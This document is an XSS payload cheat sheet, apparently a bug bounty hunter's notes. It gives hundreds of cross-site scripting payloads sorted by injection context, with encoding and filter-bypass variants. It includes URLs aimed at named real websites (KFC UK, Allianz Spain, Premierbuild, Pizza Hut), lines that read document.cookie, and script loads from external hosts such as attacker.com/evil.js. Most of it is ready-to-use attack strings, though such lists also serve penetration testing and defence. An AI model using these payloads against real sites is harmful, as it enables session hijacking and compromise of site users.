🧨XSS Context Besed

Path-based xss with different types of methods

Inecject payload in every path and check xss

append fake parameters in every path and check the xss vulnerability

PATH Based - XSS Injection

Example:
https://premierbuild.com/asad"><img src=a onerror=alert(document.domain)>/..CFIDE/administrator/index.cfm
https://www.premierbuild.com/asad%22%3E%3Cimg%20src=a%20onerror=alert(document.domain)%3E/..CFIDE/administrator/index.cfm
https://mobile.premierbuild.com/asad%22%3E%3Cimg%20src=a%20onerror=alert(document.domain)%3E/..CFIDE/administrator/index.cfm
https://m.atlas.kfc.co.uk:8443/MicroStrategyLibrary/style/vge01'-alert(document.domain)-'vephk/favicon.ico
https://app-webtech-web.plutopreprod.tv/stream-br/category/5"><svg onload=alert(document.cookie)>"f862733747338000786e085/view-all
https://www.allianz.es/xx<a href="javascript:prompt(document%2edomain)">aaaa.childrenlist.html
https://www.allianz.es/seguros/especialidades/"><img src=a onerror=alert(document.domain)>.childrenlist.html

first Realize what Path value is Reflected in the Source Code:
Copy Path value and Search in Source Code then escape it....

<form action="/gym.php" method="POST">

Then, type Simple input like asad after Path-Valueand realize that input was reflected on the page or source code or inspect Dom
if reflected then put Path-Value">asad and check if it escapes the area where it is reflected
Then try After Path: Path-Value'"><script>alert(1)</script>
And try/ After Path: Path-Value/'"><script>alert(1)</script>
And try; After Path: Path-Value/;'"><script>alert(1)</script>
And Then try ? After Path: Path-Value/?'"><script>alert(1)</script>
And Then try ? After Path: Path-Value/?&xx&xx'"><script>alert(1)</script>
And Then try > After Path: Path-Value>'"><script>alert(1)</script>
Try & After Path: Parameter-Value&'"><script>alert(1)</script>

---------------------------------------------------------------

My-XSS-Probe:

'>"><S>asad
'"></h2><marquee>Hacked_by_Synack</marquee>
'"/><a href="rg"><h2>asad

If Payload Encode then Search .replace in Source-Code

Url encode - W3cubToolstools.w3cub.com

Html Escape/Unescape - W3cubToolstools.w3cub.com

Deobfuscate Code - W3cubToolstools.w3cub.com

Double URL Escape encoding:

%253Cscript%253Ealert(origin)%253C%252Fscript%253E
%2527%2522%253E%253CScRiPt%253Econfirm%25281%2529%253C%252FScRiPt%253E
--------------------------------------------------
'  -->  %2527
"  -->  &#34; 
>  -->  %253E 
<  -->  %253C
/  -->  %252F
Space -->  %2520
(  -->  %2528
)  -->  %2529

Unicode Escape encoding:

\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(origin)\u0022\u003e
\u0022\u003e\u003cimg src=x onerror=alert(1)\u003e
--------------------------------------------------
'  -->  \u0027
"  -->  \u0022 
>  -->  \u003e 
<  -->  \u003c
/  -->  \u002f
Space -->  \u0020
=  -->  \u003d
(  -->  \u0028
)  -->  \u0029

HTML entity Escape encoding:

&apos;&quot;&gt;&lt;img src=x onerror=&quot;confirm(origin)&quot;&gt;
&quot;&gt;&lt;img src=x onerror=confirm&lpar;&rpar;&gt;
&#34;&#62;&#60;img src=x onerror=confirm&#40;&#41;&#62;
--------------------------------------------------
%3CSvg+OnLoad=confirm(1)%3E%80
<Svg+OnLoad%3Dconfirm%281%29>�
--------------------------------------------------
'  -->  &apos;
"  -->  &quot;
>  -->  &gt; 
<  -->  &lt;
/  -->  &sol;
=  -->  &equals;
(  -->  &lpar;
)  -->  &rpar;

---------------------------------------------------------------

HTML Context:

<body>
{{userinput}}
</body>

Sunerio:

'"><img src='#' onerror='confirm(window.origin)'>">
<img src=x onerror="confirm(origin)">
<img/src/onerror=confirm[document`location`]>
<iframe onload=confirm(1)>
<ScRiPt>alert(1)</sCrIpT>
<Img Src=x onerror=confirm(1)>
<Svg OnLoad=confirm(1)>
<embed src=//14.rs>
<script/src=//15.rs></script>
<script src=//⑮.₨></script>
<a href=JaVaSCrIpT:confirm(2)>XSS</a>
<k autofocus contenteditable onfocus=confirm(1)>focus this!

%22%27%2F%3E%3Cscript%3Ealert%28'Props+To+TheRat'%29%3C%2Fscript%3E&query=3&scope=domain&artifact=2&Button=Search

---------------------------------------------------------------

Attribute Context:

<input type="" name="input" value="user input"> <!-- double quoted -->
<input type="" name="input" value='user input'> <!-- single quoted -->
<input type="" name="input" value=user input> <!-- without quotations -->

Sunerio:

'"onmouseover=alert(1)//
"autofocus onfocus=confirm`1`
'"autofocus/onfocus="confirm(1)
'"><a href=JaVaSCrIpT:confirm(document.domain);>Click Hare</a>
'"><IFRAME SRC="javascript:confirm('XSS');"></IFRAME>
'"><a autofocus contenteditable onfocus=alert(1)>focus this!
'"><ScRiPt>confirm(1)</sCrIpT>
'"><embed src=//14.rs>
'"><img src=x onerror="confirm(origin)">
'"><Svg OnLoad=confirm(1)>
----------------------
# Hidden Inputs:
"accesskey="X" onclick="alert(1)"   --> Alt+SHIFT+X
----------------------
# Disabled Inputs (Firefox only):
"style="position:fixed;top:0;left:0;border:999em solid red;" onmouseover="alert(1)
--------------------------------------------------------------------

---------------------------------------------------------------

URL Context:

Script Tag:

<script src="userinput"></script>

Sunerio:

'"><Img Src=x onerror=confirm(1)>
'"><Svg OnLoad=confirm(1)>
http://attacker.com/evil.js

Anchor Tag:

<a href="userinput">Click</a>
<a href="userinput" class="btn">button</a>

Sunerio:

<a href="https://www.dahaboo.com/voitures-12/?t=1&'"><script>alert(1)</script>/=">

javascript:alert(1)//
%00javascript:alert(1)//
%20javascript:alert(1)//
javascript:javascript:alert(1)
/?.'"><script>alert(1)</script>
&'"><script>alert(1)</script>
</a><ScRiPt>alert(1)</sCrIpT>
'"><Img Src=x onerror=confirm(1)>
'"><Svg OnLoad=confirm(1)>

Iframe Tag:

<iframe src="userinput" />

Sunerio:

javascript:confirm(1)//
'"/><Img Src=x onerror=confirm(1)>
'"/><Svg OnLoad=confirm(1)>

Form Tag:

<form action="userinput">

Sunerio:

<form  action="/login.php/"><script>alert(1)</script>

/” onmouseover=”confirm(1);
/'"><script>confirm(1)</script>
'"><Img Src=x onerror=confirm(1)>
'"><Svg OnLoad=confirm(1)>
'"></form>"><ScRiPt>confirm(1)</sCrIpT>
javascript:confirm(1)//

Frameset Tag:

<frameset><frame src="userinput"></frameset>

Sunerio:

'"><Img Src=x onerror=confirm(1)>
'"><Svg OnLoad=confirm(1)>
javascript:confirm(1)//

"><Img Src=x onerror=confirm(1)>
'"><Svg OnLoad=confirm(1)>
http://attacker.com/evil.js?#

---------------------------------------------------------------

javascript Context:

Single Qoute:

<script> var x='userinput'; </script>

Sunerio:

var lang = ''-alert(Document.domain)-'';
var paramType = ''-alert(Document.domain)-'',

';alert(document.domain)//
'-(alert)(origin)-'
'-alert(document.domain)-'
'+alert(document.domain)+'
'*alert(document.domain)*'
</script><svg/onload=alert(1)>
if Filtered \: <iframe srcdoc="<script nonce=ETRACTED_VAL>alert(origin);</script>">

Double Qoute:

<script> var x="userinput"; </script>

Sunerio:

";alert(document.domain)//
"-(alert)(origin)-"
"-alert(document.domain)-"
"+alert(document.domain)+"
"*alert(document.domain)*"
</script><svg/onload=alert(1)>
if Filtered \: <iframe srcdoc="<script nonce=ETRACTED_VAL>alert(origin);</script>">

Without Qoute:

<script> var x=userinput; </script>

Sunerio:

alert(document.domain);
1-alert(document.domain);
alert(document.domain)//
</script><svg/onload=alert(1)>

---------------------------------------------------------------

-------------------------------------------------------------------------------------
Simple Payloads:
<img Src=OnXSS OnError=alert(1)>
'"/><img src=x onerrora=confirm() onerror=confirm(1)>
'"><svg onloado=confirm() onload=confirm(1) onloado=confirm()>
 %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
‘"><input autofocus onfocus=alert(1)>
<ScRiPt>alert(1)</sCrIpT>
'>">"><ScRiPt>alert(1)</sCrIpT>      is very Usefull
'"></a><ScRiPt>alert(1)</sCrIpT>    if Use reflect in URL a tag in Source Code
'"></script>"><ScRiPt>alert(1)</sCrIpT> if Use reflect in a <span> tag in Source Code
</</script>script> <</svg>svg/onload=alert`xss`>// bypass filter in script tag
"><ScRiPt>alert(/OPENBUGBOUNTY/)</sCrIpT>
"/><svg+svg+svg\/\/On+OnLoAd=confirm(1)>
'"/><Img Src=OnXSS OnError=confirm("Hacked_by_ASAD")>
'"><Svg OnLoad=alert(/OPENBUGBOUNTY/)>
'"><Img Src=x onerror=alert(1)>
”/><a href=testing>THIS IS AN INJECTED HTML LINK</a>”  "/> at the start of the payload, escape <meta> tag
'"><a href="JaVaSCrIpT:alert(2)">XSS</a>
<a href="ja%0Dva%0Dscr%0Dipt:aler%0Dt(1)">  
"autofocus/onfocus="alert(/OPENBUGBOUNTY/)
<u/onmouseover=alert(1)>asad123
'"/></a></script><ScRiPt>alert(/OPENBUGBOUNTY/)</sCrIpT>
For any query feel free to contact me at: contact@muhammadasad.pk
--------------------------------------------------------------------
Bypass Injections obfuscation techniques: 

<<svg/onload=alert(1)>
"><img src=x onerrora=confirm() onerror=confirm(1)>
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
<math><style><img src onerror=alert(2)></style></math>
<img/src=x onError="`${x}`;alert(`document.domain`);">
<iframe+/ON+onload=%20alert(/str0d/)>
1'\"><img/src/onerror=.1|alert``>
\">'><details/open/ontoggle=confirm('Fire-by-Asad')>
<Img Src=//X55.is OnLoad=import(src)>

</<K><Svg Onload=alert(1)>
</<Kno XSS="><Svg Onload=alert(1)>
<!<K><Svg Onload=alert(1)>
<!<Kno XSS="><Svg Onload=alert(1)>
<Svg/OnLoad=location=textContent>JavaScrip<k>t:aler<k>t(<k>1)//
<img/src=x onError="`${x}`;alert(`1`);">

<svg onx=() onload=(confirm)(1)>
<svg on =i onload=alert(domain)>
<svg onx=() onload=window.alert?.(2)>
<svg/on%20onload=alert(1)>


<A %252F=""Href= JavaScript:k='a',top[k%2B'lert'](1)>
<a href="javas&Tab;cript:alert()">XSS</a>
<a href="javas&#9;cript:alert()">XSS</a>
<a href="javas&#x09;cript:alert()">XSS</a>
<a href="j&#9;a&#9;v&#9;a&#9;s&#9;c&#9;r&#9;i&#9;p&#9;t:alert()">XSS</a>
<a href="j&#x09;a&#x09;v&#x09;a&#x09;s&#x09;c&#x09;r&#x09;i&#x09;p&#x09;t:alert()">XSS</a>
<a href="j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t:alert()">XSS</a>


'"></a></script></title></form></span></meta></style></iframe></noscript></textarea></xmp></pre><ScRiPt>alert(/HAMZA-SAKHI/)</sCrIpT>

---------------------------------------------------------------

Parameters

looking in your Burp proxy History for ?parameter=

You can also browse endpoint.js files (look for innerHTML, var = getParameter() parameter pathname document.write(, document.cookie, location.href, location.search redirectUrl, window.hash)or you can simply brute force commonly known parameter names, such as returnUrl.

large companies re-use code & parameter names across lots of endpoints.

Note: Do not waste time browsing things such as jquery.js.

Typically these files do not contain anything that will be of use to you.

Go for the custom-made specific endpoint.js files.

---------------------------------------------------------------

HTML Injections ……

You can customize the payloads to find what it reflects and manually make a bypass payload.

Simple HTML Injection

Use when input lands inside an attribute’s value outside the tag except the ones described in the next case.

The most straightforward one is that input is reflected just right in the code between existing tags, after or before them. Without the need to escape or break anything,

http://brutelogic.com.br/xss.php?a=<svg onload=alert(1)>
--------------------------------------------------------------------
><svg onload=alert(1)>
"><svg onload=alert(1)>
----------------------------------
<script>alert(1)</script>
"><script>alert(1)</script>
----------------------------------
<img src=x onerror=alert(1)>
"><img src=x onerror=alert(1)>
--------------------------------------------------------------------
<imsofake onpointerrawupdate=alert(1)>touch

---------------------------------------------------------------

HTML entity and URL encoding:

"  -->  &#34; &#34;&gt;&lt;svg/onload=alert(document.cookie)&gt;
>  -->  &gt; 
<  -->  &lt;
'  -->  &#x27;
`  -->  \%60

if Block onerror,onload,onclick Event-handler – Use this

Use when input lands inside an attribute’s value of an HTML tag or outside tag. But if Block onerror, onload, onclick Event-handler “Then Use “onpointerrawupdate” event-handler case below.

Always look to the attribute value (Double Quotes) or (Single Quotes) then add the payload

--------------------------------------------------------------------
<imsofake onpointerrawupdate=alert(1)>touch
"><imsofake onpointerrawupdate=alert(1)>touch
?Param=value"onpointerrawupdate='alert(1)'">
--------------------------------------------------------------------

---------------------------------------------------------------

Simple HTML Injection – Attribute Breakout

Use when input lands inside an attribute’s value of an HTML tag or outside tag except the ones described in the “Tag Block Breakout” case below.

Always look to the attribute value (Double Quotes) or (Single Quotes) then add the payload

--------------------------------------------------------------------
"><svg onload=alert(1)>
"><script>alert(1)</script>
--------------------------------------------------------------------

---------------------------------------------------------------

Simple HTML Injection – Comments Breakout

Use when input lands inside the comments section (between  ) of the HTML document.

--------------------------------------------------------------------
--><svg onload=alert(1)>
--><script>alert(1)</script>
<?><svg onload=alert(1337)>
<?php><svg onload=alert(1337)>
--------------------------------------------------------------------

---------------------------------------------------------------

inside Comments Bypass

Vector to use if only anything inside HTML comments is allowed.

Regex example: //

--------------------------------------------------------------------
--!><svg/onload=alert(1)>
<!--><svg%20onload=alert(1)>-->
<!--><script>alert(1)</script>-->
--------------------------------------------------------------------

---------------------------------------------------------------

HTML Injection in JS (Javascript) Block – Script Breakout

Input sometimes lands into a javascript block (script tags), but the website blocks single or Double Quotes, usually in the value of some variable of the code. However because the HTML tags have priority in the browser’s parsing, we can simply terminate the block and insert a new tag.

Always look to the attribute value (Double Quotes) or (Single Quotes) then add the payload

http://brutelogic.com.br/xss.php?c1=</script><svg onload=alert(1)>
--------------------------------------------------------------------
</script><svg onload=alert(1)>
</script><script>alert(1)</script>
</script><img src=x onerror=alert(document.cookie)>
--------------------------------------------------------------------

---------------------------------------------------------------

Simple HTML Injection – Tag Block Breakout

Use when input lands inside or between opening/closing of some tags like title, style, script, iframe, noscript, xmp, pre, and textarea, respectively.

Always look to the attribute value (Double Quotes) or (Single Quotes) then add the payload

--------------------------------------------------------------------
</title><svg onload=alert(1)>
</style><svg onload=alert(1)>
</form><svg onload=alert(1)>
</script><svg onload=alert(1)>
</iframe><svg onload=alert(1)>
</noscript><svg onload=alert(1)>
</textarea><svg onload=alert(1)>
</xmp><svg onload=alert(1)>
</pre><svg onload=alert(1)>
</a><svg onload=alert(1)>
</div><svg onload=alert(1)>
-----------------------------
"></title><svg onload=alert(1)>
"></style><svg onload=alert(1)>
"></form><svg onload=alert(1)>
"></script><svg onload=alert(1)>
"></iframe><svg onload=alert(1)>
"></noscript><svg onload=alert(1)>
"></textarea><svg onload=alert(1)>
"></xmp><svg onload=alert(1)>
"></pre><svg onload=alert(1)>
"></a><svg onload=alert(1)>
"></div><svg onload=alert(1)>
--------------------------------------------------------------------
'></title><svg onload=alert(1)>
'></style><svg onload=alert(1)>
'></form><svg onload=alert(1)>
'></script><svg onload=alert(1)>
'></iframe><svg onload=alert(1)>
'></noscript><svg onload=alert(1)>
'></textarea><svg onload=alert(1)>
'></xmp><svg onload=alert(1)>
'></pre><svg onload=alert(1)>
'></a><svg onload=alert(1)>
'></div><svg onload=alert(1)>
--------------------------------------------------------------------

---------------------------------------------------------------

HTML Injection - Inline

Almost simple but with a little “> prepended to break out of the current tag.

Always look to the attribute value (Double Quotes) or (Single Quotes) then add the payload

http://brutelogic.com.br/xss.php?b1=”><svg onload=alert(1)>
--------------------------------------------------------------------
"><svg onload=alert(document.cookie)>
"><img src=x onerror=alert(document.cookie)>
"><script>alert(document.cookie)</script>
--------------------------------------------
'><svg onload=alert(document.cookie)>
'><img src=x onerror=alert(document.cookie)>
'><script>alert(document.cookie)</script>
--------------------------------------------------------------------

--------------------------------------------------------------

HTML Injection - Inline: No Tag Breaking

Use when input lands inside an attribute’s value of an HTML tag but that tag can’t be terminated by greater than sign (>).

When input lands in an HTML attribute and there’s filtering of greater than character (>), it’s not possible to break out of the current tag like in the previous case.

So we use an event handler appropriate to the very tag we are injecting into, like:

Which closes the value and gives room to the insertion of the onmouseover event handler. Pointing to alert(1) followed by double slashes to comment out the hanging quote, which triggers the js popup when the victim points his/her mouse over the affected input field.

Always look to the attribute value (Double Quotes) or (Single Quotes) then add the payload

http://brutelogic.com.br/xss.php?b3=” onmouseover=alert(1)//
--------------------------------------------------------------------
"onmouseover="alert(1)
"onmouseover=alert(1)//

"autofocus/onfocus="alert(1)
"autofocus onfocus=alert(1)//

****_bypass filter_****
“o<x>nmouseover=alert<x>1//
--------------------------------------------------------------------
--------------------------------------------------------------------
'onmouseover="alert(1)
'onmouseover=alert(1)//

'autofocus onfocus="alert(1)
'autofocus onfocus=alert(1)//
--------------------------------------------------------------------
Improved Likelihood of Mouse Events

Use to create a larger area for mouse events to trigger. Add the following (as
an attribute) inside any XSS vector that makes use of mouse events like
onmouseover, onclick, etc.

style=position:fixed;top:0;left:0;font-size:999px

---------------------------------------------------------------

HTML Injection - Source

Use when input lands as a value of the following HTML tag attributes: href, src, data, or action (also formaction). The second one is exclusive to script tags.

--------------------------------------------------------------------
javascript:alert(1)
data:,alert(1)
--------------------------------------------------------------------

---------------------------------------------------------------

HTML Injection – Script Breakout

Use when input lands anywhere within a script block. The vectors make use of the native (since input lands in the middle of a script block) to close the injected script.

--------------------------------------------------------------------
</script><svg onload=alert(1)>
</script><script src=data:,alert(1)>
</script><script src=//brutelogic.com.br/1.js>
--------------------------------------------------------------------

---------------------------------------------------------------

Multi Reflection HTML Injection - Double Reflection (Single Input)

Use to take advantage of multiple reflections on the same page. They also have attribute-breaking capabilities with a double quote for most common scenarios.

--------------------------------------------------------------------
"'onload=alert(1)><svg/1='
`/alert(1)'"><svg/onload='`
"'>alert(1)</script><script/1='
"*/alert(1)</script><script>/*
"`alert(1)</script><script>`
'onload=alert(1)><svg/1='
'>alert(1)</script><script/1='
*/alert(1)</script><script>/*
--------------------------------------------------------------------

---------------------------------------------------------------

Multi Reflection i HTML Injection - Triple Reflection (Single Input)

Use to take advantage of multiple reflections on the same page.

--------------------------------------------------------------------
*/alert(1)">'onload="/*<svg/1='
`-alert(1)">'onload="`<svg/1='
*/</script>'>alert(1)/*<script/1='
--------------------------------------------------------------------

---------------------------------------------------------------

Multi-Input Reflections HTML Injection - Double & Triple

Use to take advantage of multiple input reflections on the same page. Also useful in HPP (HTTP Parameter Pollution) scenarios, where there are reflections for repeated parameters. 4th payload makes use of comma-separated reflections of the same parameter.

--------------------------------------------------------------------
p=<svg 1='&q='onload=alert(1)>
p=<svg/1='&q='onload='/*&r=*/alert(1)'>
p=<svg 1='&q='onload='`&r=`alert(1)'>
p=<script/&p=/src=data:&p=alert(1)>
q=<script/&q=/src=data:&q=alert(1)>
--------------------------------------------------------------------

---------------------------------------------------------------

Multi-Input Reflections HTML Injections - JSON Encode Bypass

Use to take advantage of multiple input reflections on the same page. Useful when the 1st reflection has no execution potential and the 2nd reflection is on JSON encoded Javascript block. Vectors for parameters “p” and “q” and for “pq” which means just one parameter reflecting in those 2 different places of the code.

--------------------------------------------------------------------
p= "><!--

q= --><svg onload=alert(1)>

pq= "--><svg onload=alert(1)><!--

p= "1='

q= '><svg onload=alert(1)>

pq= "1='><svg onload=alert(1)>
--------------------------------------------------------------------

---------------------------------------------------------------

Multi Reflection HTML Injection - Alert Reuse

A vector that reflects at least twice in which the payload alert(1) is also the HTML tag or element. 2nd payload fires without user interaction.

--------------------------------------------------------------------
'onclick="1>1<alert(1)//1='
'contenteditable/onfocus="1>1<alert(1)//autofocus='
--------------------------------------------------------------------

---------------------------------------------------------------

HTML Injection – Escaped Quote Filter Bypass

Use when quotes are escaped with a backslash (" or ') in HTML context. Escaping quotes in an HTML Context is useless to prevent the breakout but changes the vector in a way that can fool filters and WAFs.

--------------------------------------------------------------------
"><k x="><svg onload=alert(1)>
--------------------------------------------------------------------

---------------------------------------------------------------

Markdown Vector

Use in text boxes, comment sections, etc that allows some markup input. Click to fire.

--------------------------------------------------------------------
[clickme](javascript:alert`1`)
--------------------------------------------------------------------

---------------------------------------------------------------

CommonMark Vectors

Use in text boxes, comment sections, etc that allows some markup (CommonMark-like) input. Click to fire.

--------------------------------------------------------------------
[click]
[click]:javascript:alert(1)

[click][x]
[x]:javascript:alert(1)

Autolink
<javascript:alert(1)>
<javascript://%0Aalert(1)>
--------------------------------------------------------------------

---------------------------------------------------------------

Onscroll Universal Vector

That vector fires without user interaction using the onscroll event handler. It works with address, blockquote, body, center, dir, div, dl, dt, form, li, menu, ol, p, pre, ul, and h1 to h6 HTML tags.

--------------------------------------------------------------------
<p style=overflow:auto;font-size:999px onscroll=alert(1)>AAA<x/id=y></p>#y
--------------------------------------------------------------------

---------------------------------------------------------------

Type Juggling

Use to pass an “if” condition matching a number in loose comparisons.

--------------------------------------------------------------------
1<svg onload=alert(1)>
1"><svg onload=alert(1)>
--------------------------------------------------------------------

---------------------------------------------------------------

SQLi Error-Based Vector

Use in endpoints where a SQL error message can be triggered (with a quote or backslash).

--------------------------------------------------------------------
'1<svg onload=alert(1)>
<svg onload=alert(1)>\
--------------------------------------------------------------------

---------------------------------------------------------------

PATH Based - XSS Injection

first Realize what URL or Path value is Reflected in the Source Code
Then, type Simple input like asad after Path-Valueand realize that input was reflected on the page or source code or inspect Dom
if reflected then put Path-Value">asad and check if it escapes the area where it is reflected

Example:
--------------------------------------------------------------------
http://premierbuild.com/uC0VzJYd"><img src=a onerror=alert(document.domain)>/..CFIDE/administrator/index.cfm
https://m.atlas.kfc.co.uk:8443/MicroStrategyLibrary/style/vge01'-alert(document.domain)-'vephk/favicon.ico
https://app-webtech-web.plutopreprod.tv/stream-br/category/5"><svg onload=alert(document.cookie)>"f862733747338000786e085/view-all
https://www.allianz.es/xx<a href="javascript:prompt(document%2edomain)">aaaa.childrenlist.html
https://www.allianz.es/seguros/especialidades/{payload}.childrenlist.html
--------------------------------------------------------------------

---------------------------------------------------------------

PHP_SELF HTML Injection

Use when the current URL is used by PHP code as an “action” attribute of an HTML form. Inject between php filename and the start of URL query (?) using a leading slash (/)

--------------------------------------------------------------------
https://brutelogic.com.br/gym.php/"><svg onload=alert(1)>?p05=FTW>
--------------------------------------------------------------------

---------------------------------------------------------------

URL Reflection HTML Injection in PHP

When the URL is reflected somehow in the source code, we can add our own XSS vector/payload to it. For PHP pages it’s possible to add anything in the URL after the page name (without changing it) with the use of a slash character (/).

try Endpoint: .php/"><svg onload=alert(1)>

try Endpoint: .htm/"><svg onload=alert(1)>

The leading tag breaking (“>) is needed to break out of the current tag and make possible the insertion of a new one.

http://pizzahut.com/fborder.php/"><svg onload=alert(document.domain)>
--------------------------------------------------------------------
"><svg onload=alert(document.domain)>
"><img src=x onerror=alert(document.domain)>
//DOMAIN/PATH/..;"><svg onload=alert(1)>
//DOMAIN/PATH/..;/"><svg onload=alert(1)>
--------------------------------------------------------------------

---------------------------------------------------------------

HTML Injection in JSP Path

try Endpoint: .jsp/"><svg onload=alert(1)>

try Endpoint: .do/"><svg onload=alert(1)>

try Endpoint: .htm/"><svg onload=alert(1)>

Use in JSP-based applications in the path of URL.

https://example.com/carbon/admin/login.jsp?msgId=';alert(1)//
--------------------------------------------------------------------
//DOMAIN/PATH/;"><Scri%7Kt>%7Krompt%6K1%6K</Scri%7Kt>
//DOMAIN/PATH/;"><svg onload=alert(1)>
//DOMAIN/PATH/..;"><svg onload=alert(1)>
//DOMAIN/PATH/..;/"><svg onload=alert(1)>
--------------------------------------------------------------------

---------------------------------------------------------------

Vectors Exclusive for ASP Pages

try Endpoint: .asp/"><svg onload=alert(1)>

try Endpoint: .htm/"><svg onload=alert(1)>

Use to bypass <[alpha] filtering in .asp pages.

XSS in ASP pages reflected inside span and < blocked

--------------------------------------------------------------------
%u003Csvg onload=alert(1)>
%u3008svg onload=alert(2)>
%uFF1Csvg onload=alert(3)>
</script><script>alert(1)</script> 
--------------------------------------------------------------------

---------------------------------------------------------------

Vectors Exclusive for ASP Page - Percentage Padding

Use to bypass <[alpha] and keyword filtering in .asp pages.

--------------------------------------------------------------------
<%S%v%g%%20%O%n%L%o%a%d%=%a%l%e%r%t%%28%1%%29%>
--------------------------------------------------------------------

---------------------------------------------------------------

Body Vectors

A collection of body vectors.

--------------------------------------------------------------------
<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)><meta content=URL;%23 http-equiv=refresh>
<body onscroll=alert(1) style=overflow:auto;height:1000px id=x>#x
<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><x id=x>#x
<body onresize=alert(1)>press F12!
--------------------------------------------------------------------

---------------------------------------------------------------

Weird XSS vectors

Just some odd/weird vectors that I don’t see mentioned often.

--------------------------------------------------------------------
<svg><animate onbegin=alert() attributeName=x></svg>
<object data="data:text/html,<script>alert(5)</script>">
<iframe srcdoc="<svg onload=alert(4);>">
<object data=javascript:alert(3)>
<iframe src=javascript:alert(2)>
<embed src=javascript:alert(1)>
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed>
<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>
--------------------------------------------------------------------

---------------------------------------------------------------

Less Known XSS Vectors

A collection of less-known XSS vectors.

--------------------------------------------------------------------
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<video ontimeupdate=alert(1) controls src=//brutelogic.com.br/x.mp4>
<input autofocus onblur=alert(1)>
<form onsubmit=alert(1)><input type=submit>
<select onchange=alert(1)><option>1<option>2
<object onerror=alert(1)>

(Firefox only)
<marquee onstart=alert(1)>
--------------------------------------------------------------------

---------------------------------------------------------------

Mixed Case Bypass

Use to bypass case-sensitive filters.

--------------------------------------------------------------------
<Svg OnLoad=alert(1)>
<Script>alert(1)</Script>
--------------------------------------------------------------------

---------------------------------------------------------------

Unclosed Tags

Use to avoid filtering based on the presence of both lower than (<) and greater than (>) signs. It requires a native greater than sign in source code after input reflection.

--------------------------------------------------------------------
<svg onload=alert(1)//
<svg onload="alert(1)"
--------------------------------------------------------------------

---------------------------------------------------------------

Uppercase Vector

Use when the application reflects input in uppercase. Replace “&” with “%26” and “#” with “%23” in URLs.

--------------------------------------------------------------------
<SVG ONLOAD=&#97&#108&#101&#114&#116(1)>
<SCRIPT SRC=//BRUTELOGIC.COM.BR/1></SCRIPT>
<IMG SRC=1 ONERROR=&#X61;&#X6C;&#X65;&#X72;&#X74;(1)>
--------------------------------------------------------------------

---------------------------------------------------------------

Extra Content for Script Tags

Use when the filter looks for “<script>” or “<script src=...” with some variations but without checking for other non-required attributes.

--------------------------------------------------------------------
<script/k>alert(1)</script>
--------------------------------------------------------------------

---------------------------------------------------------------

Fake Tags

Just some HTML vectors to try to fool filters.

--------------------------------------------------------------------
<img onerror=alert(1) </src>
<input onfocus=alert(1) </autofocus>
<details ontoggle=alert(1) </open>
--------------------------------------------------------------------

---------------------------------------------------------------

Fake Twin Tags

Some HTML vectors try to fool filters using the same attribute for the real and the fake tag.

--------------------------------------------------------------------
<base <a href=//X55.is>
<base </a href=//X55.is>
<svg><script <a href=//X55.is></script>
--------------------------------------------------------------------

---------------------------------------------------------------

Alert without Parentheses – HTML Entities

Use only in HTML injections when parentheses are not allowed. Replace “&” with “%26” and “#” with “%23” in URLs.

--------------------------------------------------------------------
<svg onload=alert&lpar;1&rpar;>
<svg onload=alert&#40;1&#41>
--------------------------------------------------------------------

---------------------------------------------------------------

PHP Email Validation Bypass

Use to bypass the FILTER_VALIDATE_EMAIL flag of PHP’s filter_var() function.

--------------------------------------------------------------------
"><svg/onload=alert(1)>"@x.y
"><svg/onload=confirm(1)>"@x.y
--------------------------------------------------------------------

---------------------------------------------------------------

Second-order HTML Injection

Use when your input will be used twice like stored normalized in a database and then retrieved for later use or inserted into DOM.

--------------------------------------------------------------------
&lt;svg/onload&equals;alert(1)&gt;
--------------------------------------------------------------------

---------------------------------------------------------------

Other SVG Vectors with Event Handlers

Use against blacklists.

--------------------------------------------------------------------
<svg><set onbegin=alert(1)>
<svg><set end=1 onend=alert(1)>
<svg><animate onbegin=alert(1)>
<svg><animate end=1 onend=alert(1)>
--------------------------------------------------------------------

---------------------------------------------------------------

Vectors without Event Handlers

Use as an alternative to event handlers, if they are not allowed. Some require user interaction as stated in the vector itself (also part of them).

--------------------------------------------------------------------
<script>alert(1)</script>
<script src=data:,alert(1)></script>
<svg><script href=data:,alert(1)></script>
<iframe src=javascript:alert(1)>
<a href=javascript:alert(1)>click
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>
<form action=javascript:alert(1)><input type=submit>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=//x55.is/w.gif>

(Firefox only):

<embed src=javascript:alert(1)>
<object data=javascript:alert(1)>
<svg><script href=data:,alert(1) />
<svg><script xlink:href=data:,alert(1) />
<math><brute href=javascript:alert(1)>click
--------------------------------------------------------------------

---------------------------------------------------------------

Vectors with Agnostic Event Handlers > Bypass Filter HTML Tag

Use the following vectors when all known HTML tag names are not allowed. Any alphabetic char or string can be used as a tag name in place of “k”. They require user interaction as stated by their very text content (which makes part of the vectors too) except the last ones.

--------------------------------------------------------------------
<k contenteditable onblur=alert(1)>lose focus!    Left Click & tab key 
<k onclick=alert(1)>click this!                   
<k oncopy=alert(1)>copy this!                     Select text then ctrl+c
